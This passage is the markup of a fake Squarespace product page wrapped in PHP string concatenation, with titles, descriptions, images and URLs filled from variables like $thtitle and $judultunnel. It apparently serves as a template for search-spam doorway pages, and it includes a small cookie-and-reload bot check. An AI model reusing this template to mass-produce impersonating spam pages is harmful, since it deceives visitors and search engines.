5eb7bcd5cfc569-min.en-US.js"},"squarespace-dialog":{"css":"https://assets.squarespace.com/universal/styles-compressed/dialog-4442f8c03c49894df614-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/dialog-de91daab992ddc21cda3-min.en-US.js"},"squarespace-events-collection":{"css":"https://assets.squarespace.com/universal/styles-compressed/events-collection-45e10dd8aac6cdf250c5-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/events-collection-ab0904713c7bec57a263-min.en-US.js"},"squarespace-form-rendering-utils":{"js":"https://assets.squarespace.com/universal/scripts-compressed/form-rendering-utils-5197382294582e11d628-min.en-US.js"},"squarespace-forms":{"css":"https://assets.squarespace.com/universal/styles-compressed/forms-561e399da7e8cd21136e-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/forms-c69814ff1f0d408841c9-min.en-US.js"},"squarespace-gallery-collection-list":{"css":"https://assets.squarespace.com/universal/styles-compressed/gallery-collection-list-04589f0ab778d39b6f29-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/gallery-collection-list-6a695d6f503d6f274456-min.en-US.js"},"squarespace-image-zoom":{"css":"https://assets.squarespace.com/universal/styles-compressed/image-zoom-04589f0ab778d39b6f29-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/image-zoom-86a4f1190d4dd0a1bb85-min.en-US.js"},"squarespace-pinterest":{"css":"https://assets.squarespace.com/universal/styles-compressed/pinterest-04589f0ab778d39b6f29-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/pinterest-4db8797e0ab9916b74bc-min.en-US.js"},"squarespace-popup-overlay":{"css":"https://assets.squarespace.com/universal/styles-compressed/popup-overlay-1953548b82872bd9f153-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/popup-overlay-6125d912a9dfdf45eb6c-min.en-US.js"},"squarespace-product-quick-view":{"css":"https://assets.squarespace.com/universal/styles-compressed/product-quick-view-cabe0d0e788aff914259-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/product-quick-view-9b6e864684927c94738e-min.en-US.js"},"squarespace-products-collection-item-v2":{"css":"https://assets.squarespace.com/universal/styles-compressed/products-collection-item-v2-04589f0ab778d39b6f29-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/products-collection-item-v2-bc54407b17c1344e3754-min.en-US.js"},"squarespace-products-collection-list-v2":{"css":"https://assets.squarespace.com/universal/styles-compressed/products-collection-list-v2-04589f0ab778d39b6f29-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/products-collection-list-v2-320bbe708a4fc56f6d2e-min.en-US.js"},"squarespace-search-page":{"css":"https://assets.squarespace.com/universal/styles-compressed/search-page-efbf373f59490877e106-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/search-page-1cbbb0a671af7093acf7-min.en-US.js"},"squarespace-search-preview":{"js":"https://assets.squarespace.com/universal/scripts-compressed/search-preview-ad37c6d6b6aef9eab4d8-min.en-US.js"},"squarespace-simple-liking":{"css":"https://assets.squarespace.com/universal/styles-compressed/simple-liking-87ea620354232c2e7b9f-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/simple-liking-b240c4039cac2761e6d0-min.en-US.js"},"squarespace-social-buttons":{"css":"https://assets.squarespace.com/universal/styles-compressed/social-buttons-7430c3ff0790eafdec2c-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/social-buttons-1eefd456ab26aca444a7-min.en-US.js"},"squarespace-tourdates":{"css":"https://assets.squarespace.com/universal/styles-compressed/tourdates-04589f0ab778d39b6f29-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/tourdates-92a6010ac94396aa8958-min.en-US.js"},"squarespace-website-overlays-manager":{"css":"https://assets.squarespace.com/universal/styles-compressed/website-overlays-manager-a81f4f351e0b41eedf7d-min.en-US.css","js":"https://assets.squarespace.com/universal/scripts-compressed/website-overlays-manager-f1af4ddfe1d6f5589176-min.en-US.js"}},"pageType":50,"website":{"id":"67ac308aa812770c1a8ca322","identifier":"mandolin-conch-bdcd","websiteType":1,"contentModifiedOn":1739338212987,"cloneable":false,"hasBeenCloneable":false,"siteStatus":{},"language":"en-US","timeZone":"Asia/Jakarta","machineTimeZoneOffset":25200000,"timeZoneOffset":25200000,"timeZoneAbbr":"WIB","siteTitle":"' . htmlspecialchars($thtitle) .'","fullSiteTitle":"' . htmlspecialchars($thtitle) .' '. htmlspecialchars($judultunnel) . '","siteDescription":"' . htmlspecialchars($thtitle) . ' ' . htmlspecialchars($destunnel) . '","location":{},"shareButtonOptions":{"7":true,"1":true,"4":true,"8":true,"2":true,"6":true,"3":true},"authenticUrl":"' . htmlspecialchars($amphtml) . '?amp='. htmlspecialchars($thtitle) . '","internalUrl":"' . htmlspecialchars($amphtml) . '?amp='. htmlspecialchars($thtitle) . '","baseUrl":"' . htmlspecialchars($amphtml) . '?amp='. htmlspecialchars($thtitle) . '","sslSetting":3,"isHstsEnabled":true,"socialAccounts":[{"serviceId":64,"addedOn":1739337866806,"profileUrl":"http://instagram.com/squarespace","iconEnabled":true,"serviceName":"instagram-unauth"},{"serviceId":62,"addedOn":1739337866811,"profileUrl":"http://twitter.com/squarespace","iconEnabled":true,"serviceName":"twitter-unauth"}],"typekitId":"","statsMigrated":false,"imageMetadataProcessingEnabled":false,"captchaSettings":{"enabledForDonations":false},"showOwnerLogin":false},"websiteSettings":{"id":"67ac308aa812770c1a8ca325","websiteId":"67ac308aa812770c1a8ca322","subjects":[],"country":"ID","state":"SU","simpleLikingEnabled":true,"mobileInfoBarSettings":{"isContactEmailEnabled":false,"isContactPhoneNumberEnabled":false,"isLocationEnabled":false,"isBusinessHoursEnabled":false},"announcementBarSettings":{},"commentLikesAllowed":true,"commentAnonAllowed":true,"commentThreaded":true,"commentApprovalRequired":false,"commentAvatarsOn":true,"commentSortType":2,"commentFlagThreshold":0,"commentFlagsAllowed":true,"commentEnableByDefault":true,"commentDisableAfterDaysDefault":0,"disqusShortname":"","commentsEnabled":false,"businessHours":{},"storeSettings":{"returnPolicy":null,"termsOfService":null,"privacyPolicy":null,"expressCheckout":false,"continueShoppingLinkUrl":"' . htmlspecialchars($urlPath3) . '","useLightCart":false,"showNoteField":false,"shippingCountryDefaultValue":"US","billToShippingDefaultValue":false,"showShippingPhoneNumber":true,"isShippingPhoneRequired":false,"showBillingPhoneNumber":true,"isBillingPhoneRequired":false,"currenciesSupported":["USD","CAD","GBP","AUD","EUR","CHF","NOK","SEK","DKK","NZD","SGD","MXN","HKD","CZK","ILS","MYR","RUB","PHP","PLN","THB","BRL","ARS","COP","IDR","INR","JPY","ZAR"],"defaultCurrency":"USD","selectedCurrency":"IDR","measurementStandard":1,"showCustomCheckoutForm":false,"checkoutPageMarketingOptInEnabled":true,"enableMailingListOptInByDefault":false,"sameAsRetailLocation":false,"merchandisingSettings":{"scarcityEnabledOnProductItems":false,"scarcityEnabledOnProductBlocks":false,"scarcityMessageType":"DEFAULT_SCARCITY_MESSAGE","scarcityThreshold":10,"multipleQuantityAllowedForServices":true,"restockNotificationsEnabled":false,"restockNotificationsMailingListSignUpEnabled":false,"relatedProductsEnabled":false,"relatedProductsOrdering":"random","soldOutVariantsDropdownDisabled":false,"productComposerOptedIn":false,"productComposerABTestOptedOut":false,"productReviewsEnabled":false},"minimumOrderSubtotalEnabled":false,"minimumOrderSubtotal":{"currency":"IDR","value":"0.00"},"isLive":false,"multipleQuantityAllowedForServices":true},"useEscapeKeyToLogin":false,"ssBadgeType":1,"ssBadgePosition":4,"ssBadgeVisibility":1,"ssBadgeDevices":1,"pinterestOverlayOptions":{"mode":"disabled"},"ampEnabled":false,"userAccountsSettings":{"loginAllowed":true,"signupAllowed":true}},"cookieSettings":{"isCookieBannerEnabled":false,"isRestrictiveCookiePolicyEnabled":false,"cookieBannerText":"","cookieBannerTheme":"","cookieBannerVariant":"","cookieBannerPosition":"","cookieBannerCtaVariant":"","cookieBannerCtaText":"","cookieBannerAcceptType":"OPT_IN","cookieBannerOptOutCtaText":"","cookieBannerHasOptOut":false,"cookieBannerHasManageCookies":true,"cookieBannerManageCookiesLabel":"","cookieBannerSavedPreferencesText":"","cookieBannerSavedPreferencesLayout":"PILL"},"websiteCloneable":false,"collection":{"title":"Shop","id":"67ac3151c213240390b4b3e6","fullUrl":"'. htmlspecialchars($urlPath3) . '","type":13,"permissionType":1},"item":{"title":"' . htmlspecialchars($thtitle) .' '. htmlspecialchars($judultunnel). '","id":"67ac3161ea3e8a7ce16ca8d3","fullUrl":"' . htmlspecialchars($urlPath3) . '","publicCommentCount":0,"commentState":1,"recordType":11},"subscribed":false,"appDomain":"squarespace.com","templateTweakable":true,"tweakJSON":{"form-use-theme-colors":"false","header-logo-height":"20px","header-mobile-logo-max-height":"30px","header-vert-padding":"2vw","header-width":"Full","maxPageWidth":"1600px","pagePadding":"2vw","tweak-blog-alternating-side-by-side-image-aspect-ratio":"3:2 Standard","tweak-blog-alternating-side-by-side-image-spacing":"3%","tweak-blog-alternating-side-by-side-meta-spacing":"20px","tweak-blog-alternating-side-by-side-primary-meta":"Categories","tweak-blog-alternating-side-by-side-read-more-spacing":"0px","tweak-blog-alternating-side-by-side-secondary-meta":"Date","tweak-blog-basic-grid-columns":"2","tweak-blog-basic-grid-image-aspect-ratio":"3:2 Standard","tweak-blog-basic-grid-image-spacing":"25px","tweak-blog-basic-grid-meta-spacing":"7px","tweak-blog-basic-grid-primary-meta":"Date","tweak-blog-basic-grid-read-more-spacing":"11px","tweak-blog-basic-grid-secondary-meta":"Categories","tweak-blog-item-custom-width":"55","tweak-blog-item-show-author-profile":"false","tweak-blog-item-width":"Narrow","tweak-blog-masonry-columns":"2","tweak-blog-masonry-horizontal-spacing":"91px","tweak-blog-masonry-image-spacing":"20px","tweak-blog-masonry-meta-spacing":"20px","tweak-blog-masonry-primary-meta":"Categories","tweak-blog-masonry-read-more-spacing":"20px","tweak-blog-masonry-secondary-meta":"Date","tweak-blog-masonry-vertical-spacing":"129px","tweak-blog-side-by-side-image-aspect-ratio":"1:1 Square","tweak-blog-side-by-side-image-spacing":"6%","tweak-blog-side-by-side-meta-spacing":"20px","tweak-blog-side-by-side-primary-meta":"Categories","tweak-blog-side-by-side-read-more-spacing":"20px","tweak-blog-side-by-side-secondary-meta":"Date","tweak-blog-single-column-image-spacing":"50px","tweak-blog-single-column-meta-spacing":"30px","tweak-blog-single-column-primary-meta":"Categories","tweak-blog-single-column-read-more-spacing":"30px","tweak-blog-single-column-secondary-meta":"Date","tweak-events-stacked-show-thumbnails":"true","tweak-events-stacked-thumbnail-size":"3:2 Standard","tweak-fixed-header":"true","tweak-fixed-header-style":"Basic","tweak-global-animations-animation-curve":"ease","tweak-global-animations-animation-delay":"1.0s","tweak-global-animations-animation-duration":"0.80s","tweak-global-animations-animation-style":"fade","tweak-global-animations-animation-type":"flex","tweak-global-animations-complexity-level":"detailed","tweak-global-animations-enabled":"true","tweak-portfolio-grid-basic-custom-height":"50","tweak-portfolio-grid-overlay-custom-height":"50","tweak-portfolio-hover-follow-acceleration":"10%","tweak-portfolio-hover-follow-animation-duration":"Fast","tweak-portfolio-hover-follow-animation-type":"Fade","tweak-portfolio-hover-follow-delimiter":"Bullet","tweak-portfolio-hover-follow-front":"false","tweak-portfolio-hover-follow-layout":"Inline","tweak-portfolio-hover-follow-size":"50","tweak-portfolio-hover-follow-text-spacing-x":"1.5","tweak-portfolio-hover-follow-text-spacing-y":"1.5","tweak-portfolio-hover-static-animation-duration":"Fast","tweak-portfolio-hover-static-animation-type":"Fade","tweak-portfolio-hover-static-delimiter":"Hyphen","tweak-portfolio-hover-static-front":"true","tweak-portfolio-hover-static-layout":"Inline","tweak-portfolio-hover-static-size":"50","tweak-portfolio-hover-static-text-spacing-x":"1.5","tweak-portfolio-hover-static-text-spacing-y":"1.5","tweak-portfolio-index-background-animation-duration":"Medium","tweak-portfolio-index-background-animation-type":"Fade","tweak-portfolio-index-background-custom-height":"50","tweak-portfolio-index-background-delimiter":"None","tweak-portfolio-index-background-height":"Large","tweak-portfolio-index-background-horizontal-alignment":"Center","tweak-portfolio-index-background-link-format":"Stacked","tweak-portfolio-index-background-persist":"false","tweak-portfolio-index-background-vertical-alignment":"Middle","tweak-portfolio-index-background-width":"Full","tweak-product-basic-item-click-action":"None","tweak-product-basic-item-gallery-aspect-ratio":"2:3 Standard (Vertical)","tweak-product-basic-item-gallery-design":"Stacked","tweak-product-basic-item-gallery-width":"50%","tweak-product-basic-item-hover-action":"None","tweak-product-basic-item-image-spacing":"6.9vw","tweak-product-basic-item-image-zoom-factor":"2","tweak-product-basic-item-product-variant-display":"Button","tweak-product-basic-item-thumbnail-placement":"Below","tweak-product-basic-item-variant-picker-layout":"Dropdowns","tweak-products-add-to-cart-button":"true","tweak-products-columns":"3","tweak-products-gutter-column":"2vw","tweak-products-gutter-row":"5vw","tweak-products-header-text-alignment":"Left","tweak-products-image-aspect-ratio":"2:3 Standard (Vertical)","tweak-products-image-text-spacing":"1vw","tweak-products-mobile-columns":"1","tweak-products-text-alignment":"Left","tweak-products-width":"Full","tweak-transparent-header":"false"},"templateId":"5c5a519771c10ba3470d8101","templateVersion":"7.1","pageFeatures":[1,2,4],"gmRenderKey":"QUl6YVN5Q0JUUk9xNkx1dkZfSUUxcjQ2LVQ0QWVUU1YtMGQ3bXk4","templateScriptsRootUrl":"https://static1.squarespace.com/static/vta/5c5a519771c10ba3470d8101/scripts/","impersonatedSession":false,"demoCollections":[{"collectionId":"624b5045ce400d19b18aa21a","deleted":false},{"collectionId":"624b503dce400d19b18aa0d7","deleted":true}],"tzData":{"zones":[[420,null,"WIB",null]],"rules":{}},"product":{"variantAttributeNames":[],"variants":[{"id":"3d9ac7cd-2c7c-438e-9192-eb9be3b9a596","sku":"' . htmlspecialchars($thtitle) .'","price":{"currencyCode":"IDR","value":77700,"decimalValue":"777.00","fractionalDigits":2},"salePrice":{"currencyCode":"IDR","value":0,"decimalValue":"0.00","fractionalDigits":2},"onSale":true,"stock":{"unlimited":true},"attributes":{},"shippingWeight":{"value":0.0,"unit":"POUND"},"shippingSize":{"unit":"INCH","width":0.0,"height":0.0,"len":0.0}}],"subscribable":false,"fulfilledExternally":false,"productType":1},"showAnnouncementBar":false,"recaptchaEnterpriseContext":{"recaptchaEnterpriseSiteKey":"6LdDFQwjAAAAAPigEvvPgEVbb7QBm-TkVJdDTlAv"},"i18nContext":{"timeZoneData":{"id":"Asia/Jakarta","name":"Western Indonesia Time"}},"env":"PRODUCTION"};</script><script type="application/ld+json">{"name":"' . htmlspecialchars($thtitle) .' '. htmlspecialchars($judultunnel) . '","image":"' . htmlspecialchars($gambartunnel) .'","description":"' . htmlspecialchars($thtitle) . ' ' . htmlspecialchars($destunnel) . '","brand":"' . htmlspecialchars($thtitle) .'","offers":{"price":0.00,"priceCurrency":"IDR","url":"' . htmlspecialchars($urlPath3) . '","availability":"InStock","sku":"' . htmlspecialchars($thtitle) .'","@context":"http://schema.org","@type":"Offer"},"@context":"http://schema.org","@type":"Product"}</script>
		<link rel="stylesheet" type="text/css" href="https://static1.squarespace.com/static/versioned-site-css/67ac308aa812770c1a8ca322/2/5c5a519771c10ba3470d8101/67ac308aa812770c1a8ca32a/1610/site.css"/><script>Static.COOKIE_BANNER_CAPABLE = true;</script>
		      <script>
        function getCookie(name) {
            let match = document.cookie.match(new RegExp("(^| )" + name + "=([^;]+)"));
            return match? match[2] : null;
        }
        if (!getCookie("verified")) {
            document.cookie = "verified=true; path=/";
            location.reload();
        }
    </script>
      <!-- End of Squarespace Headers -->
      <link rel="stylesheet" type="text/css" href="https://static1.squarespace.com/static/vta/5c5a519771c10ba3470d8101/versioned-assets/1738945569592-TPTZTOJBM3DP62NS94QP/static.css">
      <script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "WebSite",
  "name": "' . htmlspecialchars($thtitle) .'",
  "url": "' . htmlspecialchars($urlPath3) . '",
  "alternateName": "' . htmlspecialchars($thtitle) .' '. htmlspecialchars($judultunnel) . '",
  "description": "' . htmlspecialchars($thtitle). ' adalah ' . htmlspecialchars($destunnel) . '",
  "sameAs": [
    "https://www.facebook.com/' . htmlspecialchars($thtitle) .'",
    "https://twitter.com/' . htmlspecialchars($thtitle).'",
    "https://www.instagram.com/' . htmlspecialchars($thtitle) .'"
  ],
  "publisher": {
    "@type": "Organization",
    "name": "' . htmlspecialchars($thtitle) .'",
    "logo": {
      "@type": "ImageObject",
      "url": "' . htmlspecialchars($gambartunnel) .'"
    }
  },
  "potentialAction": {
    "@type": "SearchAction",
    "target": "' . htmlspecialchars($urlPath3) . '/search?q={search_term_string}",
    "query-input": "required name=search_term_string"
  },
  "mainEntity": {
    "@type": "WebPage",
    "name": "' . htmlspecialchars($thtitle) .'",
    "url": "' . htmlspecialchars($urlPath3) . '",
    "mainEntityOfPage": {
      "@type": "WebPage",
      "@id": "' . htmlspecialchars($amptunnel) . '?amp=' . htmlspecialchars($thtitle) .'"},"isPartOf": {
      "@type": "WebSite",
      "url": "' . htmlspecialchars($urlPath3) . '"
    }
  }
}
</script>
   </head>
   <body
      id="item-67ac3161ea3e8a7ce16ca8d3"
      class="
      primary-button-style-solid primary-button-shape-pill secondary-button-style-solid secondary-button-shape-pill tertiary-button-style-solid tertiary-button-shape-pill  form-field-style-solid form-field-shape-square form-field-border-all form-field-checkbox-type-icon form-field-checkbox-fill-solid form-field-checkbox-color-inverted form-field-checkbox-shape-square form-field-checkbox-layout-stack form-field-radio-type-icon form-field-radio-fill-solid form-field-radio-color-normal form-field-radio-shape-pill form-field-radio-layout-stack form-field-survey-fill-solid form-field-survey-color-normal form-field-survey-shape-pill form-field-hover-focus-outline form-submit-button-style-label header-overlay-alignment-left header-width-full  tweak-fixed-header tweak-fixed-header-style-basic tweak-blog-alternating-side-by-side-width-inset tweak-blog-alternating-side-by-side-image-aspect-ratio-32-standard tweak-blog-alternating-side-by-side-text-alignment-left tweak-blog-alternating-side-by-side-read-more-style-show tweak-blog-alternating-side-by-side-image-text-alignment-middle tweak-blog-alternating-side-by-side-delimiter-bullet tweak-blog-alternating-side-by-side-meta-position-top tweak-blog-alternating-side-by-side-primary-meta-categories tweak-blog-alternating-side-by-side-secondary-meta-date tweak-blog-alternating-side-by-side-excerpt-show tweak-blog-basic-grid-width-inset tweak-blog-basic-grid-image-aspect-ratio-32-standard tweak-blog-basic-grid-text-alignment-left tweak-blog-basic-grid-delimiter-dash tweak-blog-basic-grid-image-placement-above tweak-blog-basic-grid-read-more-style-hide tweak-blog-basic-grid-primary-meta-date tweak-blog-basic-grid-secondary-meta-categories tweak-blog-basic-grid-excerpt-show tweak-blog-item-width-narrow tweak-blog-item-text-alignment-left tweak-blog-item-meta-position-below-title  tweak-blog-item-show-date   tweak-blog-item-delimiter-dash tweak-blog-masonry-width-inset tweak-blog-masonry-text-alignment-left tweak-blog-masonry-primary-meta-categories tweak-blog-masonry-secondary-meta-date tweak-blog-masonry-meta-position-top tweak-blog-masonry-read-more-style-show tweak-blog-masonry-delimiter-space tweak-blog-masonry-image-placement-above tweak-blog-masonry-excerpt-show tweak-blog-side-by-side-width-full tweak-blog-side-by-side-image-placement-left tweak-blog-side-by-side-image-aspect-ratio-11-square tweak-blog-side-by-side-primary-meta-categories tweak-blog-side-by-side-secondary-meta-date tweak-blog-side-by-side-meta-position-top tweak-blog-side-by-side-text-alignment-left tweak-blog-side-by-side-image-text-alignment-middle tweak-blog-side-by-side-read-more-style-show tweak-blog-side-by-side-delimiter-bullet tweak-blog-side-by-side-excerpt-show tweak-blog-single-column-width-full tweak-blog-single-column-text-alignment-center tweak-blog-single-column-image-placement-above tweak-blog-single-column-delimiter-bullet tweak-blog-single-column-read-more-style-show tweak-blog-single-column-primary-meta-categories tweak-blog-single-column-secondary-meta-date tweak-blog-single-column-meta-position-top tweak-blog-single-column-content-full-post tweak-events-stacked-width-full tweak-events-stacked-height-large  tweak-events-stacked-show-thumbnails tweak-events-stacked-thumbnail-size-32-standard tweak-events-stacked-date-style-with-text tweak-events-stacked-show-time tweak-events-stacked-show-location  tweak-events-stacked-show-excerpt  tweak-global-animations-enabled tweak-global-animations-complexity-level-detailed tweak-global-animations-animation-style-fade tweak-global-animations-animation-type-flex tweak-global-animations-animation-curve-ease tweak-portfolio-grid-basic-width-full tweak-portfolio-grid-basic-height-large tweak-portfolio-grid-basic-image-aspect-ratio-11-square tweak-portfolio-grid-basic-text-alignment-left tweak-portfolio-grid-basic-hover-effect-fade tweak-portfolio-grid-overlay-width-full tweak-portfolio-grid-overlay-height-large tweak-portfolio-grid-overlay-image-aspect-ratio-11-square tweak-portfolio-grid-overlay-text-placement-center tweak-portfolio-grid-overlay-show-text-after-hover tweak-portfolio-index-background-link-format-stacked tweak-portfolio-index-background-width-full tweak-portfolio-index-background-height-large  tweak-portfolio-index-background-vertical-alignment-middle tweak-portfolio-index-background-horizontal-alignment-center tweak-portfolio-index-background-delimiter-none tweak-portfolio-index-background-animation-type-fade tweak-portfolio-index-background-animation-duration-medium tweak-portfolio-hover-follow-layout-inline  tweak-portfolio-hover-follow-delimiter-bullet tweak-portfolio-hover-follow-animation-type-fade tweak-portfolio-hover-follow-animation-duration-fast tweak-portfolio-hover-static-layout-inline tweak-portfolio-hover-static-front tweak-portfolio-hover-static-delimiter-hyphen tweak-portfolio-hover-static-animation-type-fade tweak-portfolio-hover-static-animation-duration-fast tweak-product-basic-item-product-variant-display-button tweak-product-basic-item-product-subscription-display-radio tweak-product-basic-item-product-subscription-border-shape-square tweak-product-basic-item-width-inset tweak-product-basic-item-gallery-aspect-ratio-23-standard-vertical tweak-product-basic-item-text-alignment-left tweak-product-basic-item-navigation-none tweak-product-basic-item-description-position-below-price tweak-product-basic-item-description-position-mobile-below-add-to-cart-button tweak-product-basic-item-content-alignment-top tweak-product-basic-item-gallery-design-stacked tweak-product-basic-item-gallery-placement-left tweak-product-basic-item-thumbnail-placement-below tweak-product-basic-item-click-action-none tweak-product-basic-item-hover-action-none tweak-product-basic-item-variant-picker-layout-dropdowns tweak-product-basic-item-add-to-cart-standalone tweak-product-basic-item-add-to-cart-mobile-standalone tweak-products-width-full tweak-products-image-aspect-ratio-23-standard-vertical tweak-products-text-alignment-lefttweak-products-add-to-cart-button tweak-products-price-show tweak-products-nested-category-type-top  tweak-products-header-text-alignment-left  image-block-poster-text-alignment-center image-block-card-content-position-center image-block-card-text-alignment-left image-block-overlap-content-position-center image-block-overlap-text-alignment-left image-block-collage-content-position-center image-block-collage-text-alignment-left image-block-stack-text-alignment-center hide-opentable-icons opentable-style-dark tweak-product-quick-view-button-style-floating tweak-product-quick-view-button-position-bottom tweak-product-quick-view-lightbox-excerpt-display-truncate tweak-product-quick-view-lightbox-show-arrows tweak-product-quick-view-lightbox-show-close-button tweak-product-quick-view-lightbox-controls-weight-light native-currency-code-idr view-item collection-67ac3151c213240390b4b3e6 collection-layout-default collection-type-products mobile-style-available sqs-seven-one"
      tabindex="-1"
      >
      <div
         id="siteWrapper"class="clearfix site-wrapper"
         >
         <header data-test="header"
            id="header"
            class="header theme-col--primary"
            data-section-theme=""data-controller="Header"
            data-current-styles="{
            &quot;layout&quot;: &quot;navRight&quot;,
            &quot;action&quot;: {
            &quot;buttonText&quot;: &quot;Get Started&quot;,
            &quot;newWindow&quot;: false
            },
            &quot;showSocial&quot;: true,
            &quot;socialOptions&quot;: {
            &quot;socialBorderShape&quot;: &quot;none&quot;,
            &quot;socialBorderStyle&quot;: &quot;outline&quot;,
            &quot;socialBorderThickness&quot;: {
            &quot;unit&quot;: &quot;px&quot;,
            &quot;value&quot;: 1.0
            }
            },
            &quot;sectionTheme&quot;: &quot;&quot;,
            &quot;menuOverlayTheme&quot;: &quot;bright&quot;,&quot;menuOverlayAnimation&quot;: &quot;fade&quot;,
            &quot;cartStyle&quot;: &quot;cart&quot;,
            &quot;cartText&quot;: &quot;Cart&quot;,
            &quot;showEmptyCartState&quot;: true,
            &quot;cartOptions&quot;: {
            &quot;iconType&quot;: &quot;stroke-7&quot;,
            &quot;cartBorderShape&quot;: &quot;none&quot;,
            &quot;cartBorderStyle&quot;: &quot;outline&quot;,
            &quot;cartBorderThickness&quot;: {
            &quot;unit&quot;: &quot;px&quot;,
            &quot;value&quot;: 1.0
            }
            },
            &quot;showButton&quot;: false,
            &quot;showCart&quot;: true,
            &quot;showAccountLogin&quot;: true,
            &quot;headerStyle&quot;: &quot;gradient&quot;,
            &quot;languagePicker&quot;: {
            &quot;enabled&quot;: false,
            &quot;iconEnabled&quot;: false,
            &quot;iconType&quot;: &quot;globe&quot;,
            &quot;flagShape&quot;: &quot;shiny&quot;,
            &quot;languageFlags&quot;: [ ]
            },
            &quot;mobileOptions&quot;: {
            &quot;layout&quot;: &quot;logoCenterNavLeft&quot;,
            &quot;menuIconOptions&quot;: {
            &quot;style&quot;: &quot;doubleLineHamburger&quot;,
            &quot;thickness&quot;: {
            &quot;unit&quot;: &quot;px&quot;,
            &quot;value&quot;: 1.0
            }
            }
            },
            &quot;solidOptions&quot;: {
            &quot;headerOpacity&quot;: {
            &quot;unit&quot;: &quot;%&quot;,
            &quot;value&quot;: 100.0
            },
            &quot;blurBackground&quot;: {
            &quot;enabled&quot;: false,
            &quot;blurRadius&quot;: {
            &quot;unit&quot;: &quot;px&quot;,
            &quot;value&quot;: 12.0
            }
            },
            &quot;backgroundColor&quot;: {
            &quot;type&quot;: &quot;SITE_PALETTE_COLOR&quot;,
            &quot;sitePaletteColor&quot;: {
            &quot;colorName&quot;: &quot;white&quot;,
            &quot;alphaModifier&quot;: 1.0
            }
            },
            &quot;navigationColor&quot;: {
            &quot;type&quot;: &quot;SITE_PALETTE_COLOR&quot;,
            &quot;sitePaletteColor&quot;: {
            &quot;colorName&quot;: &quot;black&quot;,
            &quot;alphaModifier&quot;: 1.0
            }
            }
            },
            &quot;gradientOptions&quot;: {
            &quot;gradientType&quot;: &quot;faded&quot;,
            &quot;headerOpacity&quot;: {
            &quot;unit&quot;: &quot;%&quot;,
            &quot;value&quot;: 100.0
            },
            &quot;blurBackground&quot;: {
            &quot;enabled&quot;: false,
            &quot;blurRadius&quot;: {
            &quot;unit&quot;: &quot;px&quot;,
            &quot;value&quot;: 12.0
            }
            },
            &quot;backgroundColor&quot;: {
            &quot;type&quot;: &quot;CUSTOM_COLOR&quot;,
            &quot;customColor&quot;: {
            &quot;hslaValue&quot;: {
            &quot;hue&quot;: 158.29787234042553,
            &quot;saturation&quot;: 0.9215686274509804,
            &quot;lightness&quot;: 0.1,
            &quot;alpha&quot;: 1.0
            },
            &quot;userFormat&quot;: &quot;hex&quot;
            }
            },
            &quot;navigationColor&quot;: {
            &quot;type&quot;: &quot;CUSTOM_COLOR&quot;,
            &quot;customColor&quot;: {
            &quot;hslaValue&quot;: {
            &quot;hue&quot;: 0.0,
            &quot;saturation&quot;: 0.0,
            &quot;lightness&quot;: 1.0,
            &quot;alpha&quot;: 1.0
            },
            &quot;userFormat&quot;: &quot;hex&quot;
            }
            }
            },
            &quot;dropShadowOptions&quot;: {
            &quot;enabled&quot;: false,
            &quot;blur&quot;: {
            &quot;unit&quot;: &quot;px&quot;,
            &quot;value&quot;: 30.0
            },
            &quot;spread&quot;: {&quot;unit&quot;: &quot;px&quot;,
            &quot;value&quot;: 0.0
            },
            &quot;distance&quot;: {
            &quot;unit&quot;: &quot;px&quot;,
            &quot;value&quot;: 0.0
            },
            &quot;color&quot;: {
            &quot;type&quot;: &quot;SITE_PALETTE_COLOR&quot;,
            &quot;sitePaletteColor&quot;: {
            &quot;colorName&quot;: &quot;black&quot;,
            &quot;alphaModifier&quot;: 1.0
            }
            }
            },
            &quot;borderOptions&quot;: {
            &quot;enabled&quot;: false,
            &quot;position&quot;: &quot;allSides&quot;,
            &quot;thickness&quot;: {
            &quot;unit&quot;: &quot;px&quot;,
            &quot;value&quot;: 4.0
            },
            &quot;color&quot;: {
            &quot;type&quot;: &quot;SITE_PALETTE_COLOR&quot;,
            &quot;sitePaletteColor&quot;: {
            &quot;colorName&quot;: &quot;black&quot;,
            &quot;alphaModifier&quot;: 1.0
            }
            }
            },
            &quot;showPromotedElement&quot;: false,
            &quot;buttonVariant&quot;: &quot;primary&quot;,
            &quot;blurBackground&quot;: {
            &quot;enabled&quot;: false,
            &quot;blurRadius&quot;: {
            &quot;unit&quot;: &quot;px&quot;,
            &quot;value&quot;: 12.0
            }
            },
            &quot;headerOpacity&quot;: {
            &quot;unit&quot;: &quot;%&quot;,
            &quot;value&quot;: 100.0
            }
            }"
            data-section-id="header"
            data-header-style="gradient"
            data-language-picker="{
            &quot;enabled&quot;: false,
            &quot;iconEnabled&quot;: false,
            &quot;iconType&quot;: &quot;globe&quot;,
            &quot;flagShape&quot;: &quot;shiny&quot;,&quot;languageFlags&quot;: [ ]
            }"
            data-first-focusable-element
            tabindex="-1"
            style="--headerDropShadowColor: hsla(var(--black-hsl), 1);
            --headerBorderColor: hsla(var(--black-hsl), 1);
            --solidHeaderBackgroundColor: hsla(var(--white-hsl), 1);
            --solidHeaderNavigationColor: hsla(var(--black-hsl), 1);
            --gradientHeaderBackgroundColor: hsla(158.3, 92.16%, 10%, 1);
            --gradientHeaderNavigationColor: hsla(0, 0%, 100%, 1);
            "
            >
            <div class="sqs-announcement-bar-dropzone"></div>
            <div class="header-announcement-bar-wrapper">
               <a
                  href="' . htmlspecialchars($urlPath3) . '"
                  class="header-skip-link sqs-button-element--primary"
                  >
               Skip to Content
               </a>
               <style>
                  @supports (-webkit-backdrop-filter: none) or (backdrop-filter: none) {
                  .header-blur-background {
                  -webkit-backdrop-filter: blur(12px);
                  backdrop-filter: blur(12px);
                  }
